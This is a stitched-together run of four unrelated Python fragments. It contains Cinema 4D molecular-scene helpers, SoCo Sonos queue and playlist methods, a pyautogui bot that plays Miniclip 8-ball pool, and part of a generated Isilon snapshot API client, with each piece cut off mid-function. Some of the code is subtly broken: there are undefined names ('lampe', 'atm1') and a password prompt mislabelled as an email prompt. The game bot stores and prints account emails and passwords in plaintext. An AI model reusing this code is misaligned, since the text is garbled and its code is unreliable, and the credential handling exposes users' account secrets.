#doc.start_undo()
if getObject(obj.GetName()) == None:
if parent != None :
if type(parent) == str : parent = getObject(parent)
doc.InsertObject(obj,parent=parent)
if centerRoot :
currentPos = obj.GetPos()
if rePos != None :
parentPos = c4dv(rePos)
else :
parentPos = getPosUntilRoot(obj)#parent.GetPos()
obj.SetPos(currentPos-parentPos)
else : doc.InsertObject(obj)
#add undo support
#doc.add_undo(c4d.UNDO_NEW, obj)
#doc.end_undo()
def AddObject(obj,parent=None,centerRoot=True,rePos=None):
doc = getCurrentScene()
#doc.start_undo()
if parent != None :
if type(parent) == str : parent = getObject(parent)
doc.InsertObject(obj,parent=parent)
if centerRoot :
currentPos = obj.GetPos()
if rePos != None :
parentPos = c4dv(rePos)
else :
parentPos = getPosUntilRoot(obj)#parent.GetPos()
obj.SetPos(currentPos-parentPos)
else : doc.InsertObject(obj)
def addObjToGeom(obj,geom):
if type(obj) == list or type(obj) == tuple:
if len(obj) > 2: geom.obj=obj
elif len(obj) == 1: geom.obj=obj[0]
elif len(obj) == 2:
geom.mesh=obj[1]
geom.obj=obj[0]
else : geom.obj=obj
def makeHierarchy(listObj,listName, makeTagIK=False):
for i,name in enumerate(listName) :
o = getObject(listObj[name])
if makeTagIK :
o.MakeTag(IK)
if i < len(listObj)-1 :
child = getObject(listObj[listName[i+1]])
child.InsertUnder(o)
def addIKTag(object):
object.MakeTag(IK)
def makeAtomHierarchy(res,parent,useIK=False):
doc = getCurrentScene()
backbone = res.backbone()
sidechain = res.sidechain()
for i,atm in enumerate(backbone):
rePos = None
prev_atom = None
at_center = atm.coords
at_obj = newEmpty(atm.full_name(),location=at_center)
bond_obj = newEmpty(atm.full_name()+"_bond")
if useIK :
addIKTag(at_obj)
addIKTag(bond_obj)
if i > 0 : prev_atom = backbone[i-1]
if prev_atom != None:
if VERBOSE : print "hierarchy backbone ",atm.name, prev_atom.name
rePos = prev_atom.coords
oparent = getObject(prev_atom.full_name()+"_bond")
if VERBOSE : print oparent.GetName()
addObjectToScene(doc,at_obj,parent=oparent,centerRoot=True,rePos=rePos)
else :
if VERBOSE : print "first atom", atm.name
addObjectToScene(doc,at_obj,parent=parent,centerRoot=True,rePos=rePos)
addObjectToScene(doc,bond_obj,parent=at_obj,centerRoot=False)
if atm.name == 'CA' :
#add the sidechain child of CA
side_obj = newEmpty(atm.full_name()+"_sidechain")
addObjectToScene(doc,side_obj,parent=at_obj,centerRoot=False)
for j,satm in enumerate(sidechain):
sat_center = satm.coords
sat_obj = newEmpty(satm.full_name(),location=sat_center)
sbond_obj = newEmpty(satm.full_name()+"_sbond")
addObjectToScene(doc,sat_obj,parent=side_obj,centerRoot=True,rePos=at_center)
addObjectToScene(doc,sbond_obj,parent=side_obj,centerRoot=False)
if useIK :
return bond_obj
else :
return parent
def makeResHierarchy(res,parent,useIK=False):
sc = getCurrentScene()
res_center = res.atoms.get("CA").coords[0]#or averagePosition of the residues?
res_obj = newEmpty(res.full_name(),location=res_center)
bond_obj = newEmpty(res.full_name()+"_bond")
rePos = None
prev_res = res.getPrevious()
if useIK :
addIKTag(res_obj)
if prev_res != None and useIK :
rePos = prev_res.atoms.get("CA").coords[0]
oparent = getObject(prev_res.full_name())
addObjectToScene(sc,res_obj,parent=oparent,centerRoot=True,rePos=rePos)
else :
addObjectToScene(sc,res_obj,parent=parent,centerRoot=True,rePos=rePos)
addObjectToScene(sc,bond_obj,parent=res_obj,centerRoot=False)
#mol.geomContainer.masterGeom.res_obj[res.name]=util.getObjectName(res_obj)
return res_obj
def addCameraToScene(name,Type,focal,center,sc):
cam = c4d.BaseObject(CAMERA)
cam.SetName(name)
cam.SetPos(c4dv(center))
cam[1001] = 1 #0:perspective, 1 :parrallel
cam[1000] = float(focal) #parrallel zoom
cam[1006] = 2*float(focal)#perspective focal
#rotation?
cam[904,1000] = pi/2.
addObjectToScene(sc,cam,centerRoot=False)
def addLampToScene(name,Type,rgb,dist,energy,soft,shadow,center,sc):
#type of light 0 :omni, 1:spot,2:squarespot,3:infinite,4:parralel,
#5:parrallel spot,6:square parral spot 8:area
#light sun type is an infinite light with a sun tag type
dicType={'Area':0,'Sun':3}
lamp = c4d.BaseObject(LIGHT)
lamp.SetName(name)
lamp.SetPos(c4dv(center))
lamp[904,1000] = pi/2.
lamp[90000]= c4d.Vector(float(rgb[0]), float(rgb[1]), float(rgb[2]))#color
lamp[90001]= float(energy) #intensity
lamp[90002]= dicType[Type] #type
if shadow : lampe[90003]=1 #soft shadow map
if Type == "Sun":
suntag = lamp.MakeTag(SUNTAG)
addObjectToScene(sc,lamp,centerRoot=False)
"""
lampe.setDist(dist)
lampe.setSoftness(soft)
"""
def reparent(obj,parent):
obj.InsertUnder(parent)
def setInstance(name,object,location=None,c4dmatrice=None,matrice=None):
instance = c4d.BaseObject(INSTANCE)
instance[1001]=object
instance.SetName(name)#.replace(":","_")
if location != None :
instance.SetPos(c4dv(location))
if c4dmatrice !=None :
#type of matre
instance.SetMg(c4dmatrice)
if matrice != None:
mx = matrix2c4dMat(matrice)
instance.SetMl(mx)
p = instance.GetPos()
instance.SetPos(c4d.Vector(p.y,p.z,p.x))
return instance
def translateObj(obj,position,use_parent=True):
if len(position) == 1 : c = position[0]
else : c = position
#print "upadteObj"
newPos=c4dv(c)
if use_parent :
parentPos = getPosUntilRoot(obj)#parent.GetPos()
newPos = newPos - parentPos
obj.SetPos(newPos)
else :
pmx = obj.GetMg()
mx = c4d.Matrix()
mx.off = pmx.off + c4dv(position)
obj.SetMg(mx)
def scaleObj(obj,sc):
if type(sc) is float :
sc = [sc,sc,sc]
obj.SetScale(c4dv(sc))
def rotateObj(obj,rot):
#take radians, give degrees
obj[sy.ID_BASEOBJECT_ROTATION, sy.VECTOR_X]=float(rot[0])
obj[sy.ID_BASEOBJECT_ROTATION, sy.VECTOR_Y]=float(rot[1])
obj[sy.ID_BASEOBJECT_ROTATION, sy.VECTOR_Z]=float(rot[2])
def toggleDisplay(obj,display):
if display : obj.SetEditorMode(c4d.MODE_UNDEF)
else : obj.SetEditorMode(c4d.MODE_OFF)
if display : obj.SetRenderMode(c4d.MODE_UNDEF)
else : obj.SetRenderMode(c4d.MODE_OFF)
if display : obj[906]=1
else : obj[906]=0
def findatmParentHierarchie(atm,indice,hiera):
#fix the problem where mol name have an "_"
if indice == "S" : n='cpk'
else : n='balls'
mol=atm.getParentOfType(Protein)
hierarchy=parseObjectName(indice+"_"+atm.full_name())
if hiera == 'perRes' :
parent = getObject(mol.geomContainer.masterGeom.res_obj[hierarchy[2]])
elif hiera == 'perAtom' :
if atm1.name in backbone :
parent = getObject(atm.full_name()+"_bond")
else :
parent = getObject(atm.full_name()+"_sbond")
else :
ch = atm.getParentOfType(Chain)
parent=getObject(mol.geomContainer.masterGeom.chains_obj[ch.name+"_"+n])
return parent
#####################MATERIALS FUNCTION########################
def addMaterial(name,color):
import c4d
import c4d.documents
doc = c4d.documents.GetActiveDocument()
# create standard material
__mat = doc.SearchMaterial(name)
if VERBOSE : | |
1),
("SortCriteria", ""),
]
)
dom = XML.fromstring(really_utf8(response["Result"]))
queue_size = None
container = dom.find("{urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/}container")
if container is not None:
child_count = container.get("childCount")
if child_count is not None:
queue_size = int(child_count)
return queue_size
def get_sonos_playlists(self, *args, **kwargs):
"""Convenience method for calling
``soco.music_library.get_music_library_information('sonos_playlists')``
Refer to the docstring for that method: `get_music_library_information`
"""
args = tuple(["sonos_playlists"] + list(args))
return self.music_library.get_music_library_information(*args, **kwargs)
@only_on_master
def add_uri_to_queue(self, uri, position=0, as_next=False):
"""Add the URI to the queue.
For arguments and return value see `add_to_queue`.
"""
# FIXME: The res.protocol_info should probably represent the mime type
# etc of the uri. But this seems OK.
res = [DidlResource(uri=uri, protocol_info="x-rincon-playlist:*:*:*")]
item = DidlObject(resources=res, title="", parent_id="", item_id="")
return self.add_to_queue(item, position, as_next)
@only_on_master
def add_to_queue(self, queueable_item, position=0, as_next=False):
"""Add a queueable item to the queue.
Args:
queueable_item (DidlObject or MusicServiceItem): The item to be
added to the queue
position (int): The index (1-based) at which the URI should be
added. Default is 0 (add URI at the end of the queue).
as_next (bool): Whether this URI should be played as the next
track in shuffle mode. This only works if ``play_mode=SHUFFLE``.
Returns:
int: The index of the new item in the queue.
"""
metadata = to_didl_string(queueable_item)
response = self.avTransport.AddURIToQueue(
[
("InstanceID", 0),
("EnqueuedURI", queueable_item.resources[0].uri),
("EnqueuedURIMetaData", metadata),
("DesiredFirstTrackNumberEnqueued", position),
("EnqueueAsNext", int(as_next)),
]
)
qnumber = response["FirstTrackNumberEnqueued"]
return int(qnumber)
def add_multiple_to_queue(self, items, container=None):
"""Add a sequence of items to the queue.
Args:
items (list): A sequence of items to the be added to the queue
container (DidlObject, optional): A container object which
includes the items.
"""
if container is not None:
container_uri = container.resources[0].uri
container_metadata = to_didl_string(container)
else:
container_uri = "" # Sonos seems to accept this as well
container_metadata = "" # pylint: disable=redefined-variable-type
chunk_size = 16 # With each request, we can only add 16 items
item_list = list(items) # List for slicing
for index in range(0, len(item_list), chunk_size):
chunk = item_list[index : index + chunk_size]
uris = " ".join([item.resources[0].uri for item in chunk])
uri_metadata = " ".join([to_didl_string(item) for item in chunk])
self.avTransport.AddMultipleURIsToQueue(
[
("InstanceID", 0),
("UpdateID", 0),
("NumberOfURIs", len(chunk)),
("EnqueuedURIs", uris),
("EnqueuedURIsMetaData", uri_metadata),
("ContainerURI", container_uri),
("ContainerMetaData", container_metadata),
("DesiredFirstTrackNumberEnqueued", 0),
("EnqueueAsNext", 0),
]
)
@only_on_master
def remove_from_queue(self, index):
"""Remove a track from the queue by index. The index number is
required as an argument, where the first index is 0.
Args:
index (int): The (0-based) index of the track to remove
"""
# TODO: what do these parameters actually do?
updid = "0"
objid = "Q:0/" + str(index + 1)
self.avTransport.RemoveTrackFromQueue(
[
("InstanceID", 0),
("ObjectID", objid),
("UpdateID", updid),
]
)
@only_on_master
def clear_queue(self):
"""Remove all tracks from the queue."""
self.avTransport.RemoveAllTracksFromQueue(
[
("InstanceID", 0),
]
)
@deprecated("0.13", "soco.music_library.get_favorite_radio_shows", "0.15", True)
def get_favorite_radio_shows(self, start=0, max_items=100):
"""Get favorite radio shows from Sonos' Radio app.
Returns:
dict: A dictionary containing the total number of favorites, the
number of favorites returned, and the actual list of favorite radio
shows, represented as a dictionary with ``'title'`` and ``'uri'``
keys.
Depending on what you're building, you'll want to check to see if the
total number of favorites is greater than the amount you
requested (``max_items``), if it is, use ``start`` to page through and
get the entire list of favorites.
"""
message = (
"The output type of this method will probably change in "
"the future to use SoCo data structures"
)
warnings.warn(message, stacklevel=2)
return self.__get_favorites(RADIO_SHOWS, start, max_items)
@deprecated("0.13", "soco.music_library.get_favorite_radio_stations", "0.15", True)
def get_favorite_radio_stations(self, start=0, max_items=100):
"""Get favorite radio stations from Sonos' Radio app.
See :meth:`get_favorite_radio_shows` for return type and remarks.
"""
message = (
"The output type of this method will probably change in "
"the future to use SoCo data structures"
)
warnings.warn(message, stacklevel=2)
return self.__get_favorites(RADIO_STATIONS, start, max_items)
@deprecated("0.13", "soco.music_library.get_sonos_favorites", "0.15", True)
def get_sonos_favorites(self, start=0, max_items=100):
"""Get Sonos favorites.
See :meth:`get_favorite_radio_shows` for return type and remarks.
"""
message = (
"The output type of this method will probably change in "
"the future to use SoCo data structures"
)
warnings.warn(message, stacklevel=2)
return self.__get_favorites(SONOS_FAVORITES, start, max_items)
def __get_favorites(self, favorite_type, start=0, max_items=100):
"""Helper method for `get_favorite_radio_*` methods.
Args:
favorite_type (str): Specify either `RADIO_STATIONS` or
`RADIO_SHOWS`.
start (int): Which number to start the retrieval from. Used for
paging.
max_items (int): The total number of results to return.
"""
if favorite_type not in (RADIO_SHOWS, RADIO_STATIONS):
favorite_type = SONOS_FAVORITES
response = self.contentDirectory.Browse(
[
(
"ObjectID",
"FV:2"
if favorite_type is SONOS_FAVORITES
else "R:0/{0}".format(favorite_type),
),
("BrowseFlag", "BrowseDirectChildren"),
("Filter", "*"),
("StartingIndex", start),
("RequestedCount", max_items),
("SortCriteria", ""),
]
)
result = {}
favorites = []
results_xml = response["Result"]
if results_xml != "":
# Favorites are returned in DIDL-Lite format
metadata = XML.fromstring(really_utf8(results_xml))
for item in metadata.findall(
"{urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/}container"
if favorite_type == RADIO_SHOWS
else "{urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/}item"
):
favorite = {}
favorite["title"] = item.findtext(
"{http://purl.org/dc/elements/1.1/}title"
)
favorite["uri"] = item.findtext(
"{urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/}res"
)
if favorite_type == SONOS_FAVORITES:
favorite["meta"] = item.findtext(
"{urn:schemas-rinconnetworks-com:metadata-1-0/}resMD"
)
favorites.append(favorite)
result["total"] = response["TotalMatches"]
result["returned"] = len(favorites)
result["favorites"] = favorites
return result
def create_sonos_playlist(self, title):
"""Create a new empty Sonos playlist.
Args:
title: Name of the playlist
:rtype: :py:class:`~.soco.data_structures.DidlPlaylistContainer`
"""
response = self.avTransport.CreateSavedQueue(
[
("InstanceID", 0),
("Title", title),
("EnqueuedURI", ""),
("EnqueuedURIMetaData", ""),
]
)
item_id = response["AssignedObjectID"]
obj_id = item_id.split(":", 2)[1]
uri = "file:///jffs/settings/savedqueues.rsq#{0}".format(obj_id)
res = [DidlResource(uri=uri, protocol_info="x-rincon-playlist:*:*:*")]
return DidlPlaylistContainer(
resources=res, title=title, parent_id="SQ:", item_id=item_id
)
@only_on_master
# pylint: disable=invalid-name
def create_sonos_playlist_from_queue(self, title):
"""Create a new Sonos playlist from the current queue.
Args:
title: Name of the playlist
:rtype: :py:class:`~.soco.data_structures.DidlPlaylistContainer`
"""
# Note: probably same as Queue service method SaveAsSonosPlaylist
# but this has not been tested. This method is what the
# controller uses.
response = self.avTransport.SaveQueue(
[("InstanceID", 0), ("Title", title), ("ObjectID", "")]
)
item_id = response["AssignedObjectID"]
obj_id = item_id.split(":", 2)[1]
uri = "file:///jffs/settings/savedqueues.rsq#{0}".format(obj_id)
res = [DidlResource(uri=uri, protocol_info="x-rincon-playlist:*:*:*")]
return DidlPlaylistContainer(
resources=res, title=title, parent_id="SQ:", item_id=item_id
)
@only_on_master
def remove_sonos_playlist(self, sonos_playlist):
"""Remove a Sonos playlist.
Args:
sonos_playlist (DidlPlaylistContainer): Sonos playlist to remove
or the item_id (str).
Returns:
bool: True if succesful, False otherwise
Raises:
SoCoUPnPException: If sonos_playlist does not point to a valid
object.
"""
object_id = getattr(sonos_playlist, "item_id", sonos_playlist)
return self.contentDirectory.DestroyObject([("ObjectID", object_id)])
def add_item_to_sonos_playlist(self, queueable_item, sonos_playlist):
"""Adds a queueable item to a Sonos' playlist.
Args:
queueable_item (DidlObject): the item to add to the Sonos' playlist
sonos_playlist (DidlPlaylistContainer): the Sonos' playlist to
which the item should be added
"""
# Get the update_id for the playlist
response, _ = self.music_library._music_lib_search(sonos_playlist.item_id, 0, 1)
update_id = response["UpdateID"]
# Form the metadata for queueable_item
metadata = to_didl_string(queueable_item)
# Make the request
self.avTransport.AddURIToSavedQueue(
[
("InstanceID", 0),
("UpdateID", update_id),
("ObjectID", sonos_playlist.item_id),
("EnqueuedURI", queueable_item.resources[0].uri),
("EnqueuedURIMetaData", metadata),
# 2 ** 32 - 1 = 4294967295, this field has always this value. Most
# likely, playlist positions are represented as a 32 bit uint and
# this is therefore the largest index possible. Asking to add at
# this index therefore probably amounts to adding it "at the end"
("AddAtIndex", 4294967295),
]
)
@only_on_master
def set_sleep_timer(self, sleep_time_seconds):
"""Sets the sleep timer.
Args:
sleep_time_seconds (int or NoneType): How long to wait before
turning off speaker in seconds, None to cancel a sleep timer.
Maximum value of 86399
Raises:
SoCoException: Upon errors interacting with Sonos controller
ValueError: Argument/Syntax errors
"""
# Note: A value of None for sleep_time_seconds is valid, and needs to
# be preserved distinctly separate from 0. 0 means go to sleep now,
# which will immediately start the sound tappering, and could be a
# useful feature, while None means cancel the current timer
try:
if sleep_time_seconds is None:
sleep_time = ""
else:
sleep_time = format(datetime.timedelta(seconds=int(sleep_time_seconds)))
self.avTransport.ConfigureSleepTimer(
[
("InstanceID", 0),
("NewSleepTimerDuration", sleep_time),
]
)
except SoCoUPnPException as err:
if "Error 402 received" in str(err):
raise ValueError(
"invalid sleep_time_seconds, must be integer \
value between 0 and 86399 inclusive or None"
) from err
raise
except ValueError as error:
raise ValueError(
"invalid sleep_time_seconds, must be integer \
value between 0 and 86399 inclusive or None"
) from error
@only_on_master
def get_sleep_timer(self):
"""Retrieves remaining sleep time, if any
| |
import json
import sys
import time
import webbrowser
import uuid
import subprocess as sub
from win32api import GetSystemMetrics
import pyautogui
import requests
import game
import utils
import constants
class Bot:
miniclipURL = "https://www.miniclip.com/games/8-ball-pool-multiplayer/en/focus/"
def __init__(self):
self.name = self.uuidGenerator()
self.height = None
self.width = None
self.gameWindow = None
def uuidGenerator(self):
stringLength = 8
randomString = uuid.uuid4().hex
randomString = randomString.lower()[0:stringLength]
return randomString
def gameMenuSearch(self, r):
imgs = [constants.img_alreadyStarted, constants.img_alreadyStarted1]
utils.debugPrint("Checking for Game Menu...")
r += 1
for img in imgs:
utils.debugPrint("Image {}...".format(img))
for i in range(0, r + 1):
pos = utils.imageSearch(img)
if pos is None:
utils.debugPrint("Attempts: " + str(r - i))
self.dismiss(1)
time.sleep(.5)
else:
return True
return False
def dismiss(self, r):
imgs = [constants.img_cueUpdate, constants.img_cues, constants.img_backButton]
utils.debugPrint("Checking for cue notification.")
r += 1
for img in imgs:
utils.debugPrint("Image {}...".format(img))
for i in range(0, r + 1):
pos = utils.imageSearch(constants.img_cueUpdate)
if pos is None:
utils.debugPrint("Attempts: " + str(r-i))
time.sleep(.1)
else:
return True
def click(self, img, gameWindow):
for i in range(0, 5):
if gameWindow is None:
pos = utils.imageSearch(img)
else:
pos = utils.imageSearch(img, gameWindow)
if pos is None:
continue
else:
pyautogui.click(pos)
utils.debugPrint("{} found and clicked.".format(img))
time.sleep(.5)
break
def start(self):
uuid = self.uuidGenerator()
print("Bot {} beginning setup.".format(uuid))
# Checks if webpage still present
result = utils.CheckForUrl(5)
if result is False:
nWin = utils.timedInput("Did not detect website. Open new tab/window? Press CTRL+C to begin typing.")
if nWin is True:
webbrowser.open(Bot.miniclipURL)
time.sleep(5)
self.start()
else:
print("Exiting..")
sys.exit()
else:
# webpage is still visible
login = self.ifLogin()
if login is None:
utils.debugPrint("Error confirming login status. Waiting 10 seconds and attempting once more.")
time.sleep(10)
login = self.ifLogin()
if login is None:
utils.debugPrint("Login systems failed. Cannot proceed.\nExiting..")
time.sleep(2)
sys.exit()
# login status confirmed, either logged in or not
# if login is None, exits. login is either True or False
gameReg = self.getGameRegion(login)
if gameReg is False or gameReg is None:
utils.debugPrint("Error acquiring game region. Waiting 10 seconds and attempting once more.")
time.sleep(10)
gameReg = self.getGameRegion(login)
if gameReg is False:
utils.debugPrint("Acquisition of game region failed. Cannot proceed.\nExiting..")
time.sleep(2)
sys.exit()
# game region successfully acquired
if login is False:
# user not logged in, navigate menu that only shows for users not logged in
nM = self.navigateMenu(login)
if nM is False:
# play as guest
self.playPoolGame()
else:
# log in and play game
self.logIn()
time.sleep(.5)
#self.spinWin(5)
#self.collectCoins(5)
dG = self.decideGame(5)
if dG is False:
utils.debugPrint("Game choice not made. Cannot proceed.\nExiting..")
time.sleep(2)
sys.exit()
else:
play = self.playPoolGame()
if play is True:
while play is True:
pA = utils.timedInput("Play another game? Press CTRL+C to begin typing.", 15)
if pA is True:
play = self.playPoolGame()
else:
utils.debugPrint("Exiting..")
time.sleep(2)
sys.exit()
utils.debugPrint("Terminating Bot..")
time.sleep(3)
sys.exit()
def ifLogin(self):
limit = 30
utils.debugPrint("Checking to see if already logged in.")
loggedIn = self.loginCheck()
while loggedIn is None and limit > 0:
utils.debugPrint("Did not find URL.\nRetrying..")
time.sleep(1)
limit -= 1
loggedIn = self.loginCheck()
if loggedIn is None:
return None
utils.debugPrint("loginCheck succeeded.")
return True
def loginCheck(self):
imgs = [constants.img_allowFlash, constants.img_allowFlash1, constants.img_allowFlash2, constants.img_allow]
time.sleep(1)
loggedIn = utils.CheckForUrl(5)
if loggedIn is False:
print("Could not identify visible tab. Opening new tab.")
webbrowser.open(Bot.miniclipURL)
return None
else:
for img in imgs:
utils.debugPrint("Searching for image {}...".format(img))
pos = utils.imageSearch(img)
if pos is None:
utils.debugPrint("{} not detected.".format(img))
continue
else:
self.click(img, self.gameWindow)
if img == constants.img_allowFlash or img == constants.img_allowFlash1:
for i, v in enumerate(imgs):
if 3 >= i >= 2:
p = utils.imageSearch(v)
if p is None:
utils.debugPrint("{} not detected.".format(v))
return None
else:
self.click(img, self.gameWindow)
continue
imgs = [constants.img_signUpLogin, constants.img_defaultAcct]
for img in imgs:
utils.debugPrint("Searching for image {}...".format(img))
for i in range(0, 5):
pos = utils.imageSearch(img)
if pos is None:
utils.debugPrint("{} not detected.".format(img))
continue
else:
if img == constants.img_signUpLogin:
utils.debugPrint("User not logged in.")
return False
if img == constants.img_defaultAcct:
utils.debugPrint("Logged into default account.")
return True
loggedIn = utils.CheckForUrl(5)
if loggedIn is False:
return None
else:
utils.debugPrint("Correct tab still visible.")
account = utils.timedInput("Are you logged into your own account? Press CTRL+C to begin typing.")
if account is False:
utils.debugPrint("User not logged into their own account and default account not detected.")
return None
else:
utils.debugPrint("User logged into their own account.")
default = utils.timedInput("Would you like to save it as the default?")
if default is False:
utils.debugPrint("User using account other than default.")
print("Proceeding...")
return True
else:
utils.debugPrint("Saving new account as default.")
reg = utils.imageSearch(constants.img_facebookLogo)
pyautogui.screenshot("images/" + constants.img_defaultAcct,
region=((reg[0] + reg[2]) - 170, reg[1], 170, 40))
utils.debugPrint("Overwriting pre-existing image of default account.")
while True:
newemail = input("Please enter the email associated with the account.")
newpass = input("Please enter the password associated with the account.")
confirm = utils.timedInput("User is {} and the password is {}?".format(newemail, newpass))
if confirm is True:
with open("default.txt", "w") as f:
for line in f:
if line is None:
utils.debugPrint("Default username file is empty.")
else:
utils.debugPrint("Overwriting pre-existing contents.")
f.write("{} {}".format(newemail, newpass))
print("New default account set. {}:{}".format(newemail, newpass))
f.close()
return True
def getGameRegion(self, loginTruthVal):
limit = 3
self.height, self.width = self.miniclipAPI()
utils.debugPrint("Size of game window retrieved.")
time.sleep(1)
self.clickX()
utils.debugPrint("Searching for top right of game window.")
gM = self.gameMenuSearch(5)
if gM is False:
result = utils.CheckForUrl(5)
if result is True:
proceed = utils.timedInput("Game menu not found. Proceed anyway? Press CTRL+C to begin typing.")
if proceed is True:
utils.debugPrint("Proceeding..")
return False
else:
utils.debugPrint("Backing out..")
return None
else:
proceed = utils.timedInput(
"Game menu not found. Webpage not found. Open new tab/window? Press CTRL+C to begin typing.")
if proceed is True:
utils.debugPrint("Opening new tab..")
webbrowser.open(Bot.miniclipURL)
time.sleep(5)
self.start()
else:
utils.debugPrint("Backing out..")
return None
utils.debugPrint("Game menu found.")
if loginTruthVal is False:
utils.debugPrint("User not logged in.")
time.sleep(1)
utils.debugPrint("Searching for game region..")
cor = self.searchForGameCorner(constants.img_topRightCorner, 20)
if cor is True:
return True
if limit > 0:
utils.debugPrint("{} tries left.".format(limit))
else:
return False
else:
utils.debugPrint("User logged in.")
time.sleep(1)
utils.debugPrint("Searching for game region..")
cor = self.searchForGameCorner(constants.img_topRightCornerLogged, 20)
if cor is True:
return True
if limit > 0:
utils.debugPrint("{} tries left.".format(limit))
else:
return False
def miniclipAPI(self):
utils.debugPrint("Accessing miniclip's API.")
api_url_base = "https://webmasters.miniclip.com/api/"
api_url = "{0}/games/2471/en.json".format(api_url_base)
try:
response = requests.get(api_url)
utils.debugPrint("Requesting connection.")
if response.status_code == 200:
utils.debugPrint("Connection accepted.")
data = json.loads(response.content.decode("utf-8"))
h = int(data["2471"].get("height"))
w = int(data["2471"].get("width"))
return h, w
except requests.exceptions.ConnectionError:
requests.status_code = "Connection refused"
utils.debugPrint("Connection refused. Retrying 5 times.")
for i in range(1, 5):
time.sleep(1)
response = requests.get(api_url)
self.miniclipAPI()
def searchForGameCorner(self, img, attempts):
reg = pyautogui.locateOnScreen(utils.imagePath(img))
if reg is not None:
topRX = reg[0] + reg[2]
topRY = reg[1]
self.gameWindow = (topRX - self.width, topRY, self.width, self.height)
utils.debugPrint("Region acquired." + str(self.gameWindow))
return True
else:
utils.debugPrint("Region not found. Attempting {} more times.".format(attempts))
#self.spinWin()
#self.clickX()
while attempts > 0:
reg = pyautogui.locateOnScreen(utils.imagePath(img))
if reg is None:
utils.debugPrint("Attempts: " + str(attempts))
attempts -= 1
elif reg is not None:
topRX = reg[0] + reg[2]
topRY = reg[1]
self.gameWindow = (topRX - self.width, topRY, self.width, self.height)
utils.debugPrint("Region acquired." + str(self.gameWindow))
return True
return False
def navigateMenu(self, truthVal):
pos = utils.imageSearch(constants.img_loginWithMiniclip, self.gameWindow)
pos1 = utils.imageSearch(constants.img_playButtonGuest, self.gameWindow)
if pos is None and pos1 is None:
utils.debugPrint("Cannot find play buttons.\nRefreshing page.")
self.refreshPage()
utils.debugPrint("Attempting to renavigate menu.")
self.navigateMenu(truthVal)
else:
utils.debugPrint("Found play buttons.")
guest = utils.timedInput("Login? Or play as a guest? Press CTRL+C to begin typing.", 10, ["guest", "log"])
if guest is True or guest is None:
utils.debugPrint("Playing as guest.")
pyautogui.click(pos1)
return False
else:
utils.debugPrint("Logging in.")
pyautogui.click(pos)
return True
def logIn(self):
email = ""
password = ""
acct = utils.timedInput("Do you have an account you\'d like the bot to play on? Press CTRL+C to begin typing.")
if acct is False or acct is None:
print("Using default.")
with open("default.txt", "r") as f:
for line in f:
if line is None:
utils.debugPrint("No default account found.")
else:
email, password = line.split(" ")
else:
email = input("Please enter the email. No time limit. Does not save your info.\n:")
password = input("Please enter the email. No time limit. Does not save your info.\n:")
self.click(constants.img_emailArea, self.gameWindow)
pyautogui.typewrite(email)
time.sleep(.5)
self.click(constants.img_passwordArea, self.gameWindow)
pyautogui.typewrite(password)
time.sleep(.5)
self.click(constants.img_loginButton3, self.gameWindow)
def decideGame(self, attempts):
attempts += 1
for i in range(1, attempts + 1):
utils.debugPrint("Initiating game selection.")
gM = self.gameMenuSearch(5)
if gM is False:
url = utils.CheckForUrl(5)
if url is False:
proceed = utils.timedInput(
| |
= self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/repstates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotRepstatesExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_snapshot_schedules(self, **kwargs): # noqa: E501
"""list_snapshot_schedules # noqa: E501
List all or matching schedules. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_schedules(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, pattern, schedule, duration, alias, next_run, and next_snapshot. Default is id.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotSchedulesExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
return data
def list_snapshot_schedules_with_http_info(self, **kwargs): # noqa: E501
"""list_snapshot_schedules # noqa: E501
List all or matching schedules. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_schedules_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, pattern, schedule, duration, alias, next_run, and next_snapshot. Default is id.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotSchedulesExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'limit', 'dir', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_snapshot_schedules" % key
)
params[key] = val
del params['kwargs']
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_schedules`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_schedules`, must be a value greater than or equal to `1`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_snapshot_schedules`, length must be greater than or equal to `0`") # noqa: E501
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_schedules`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
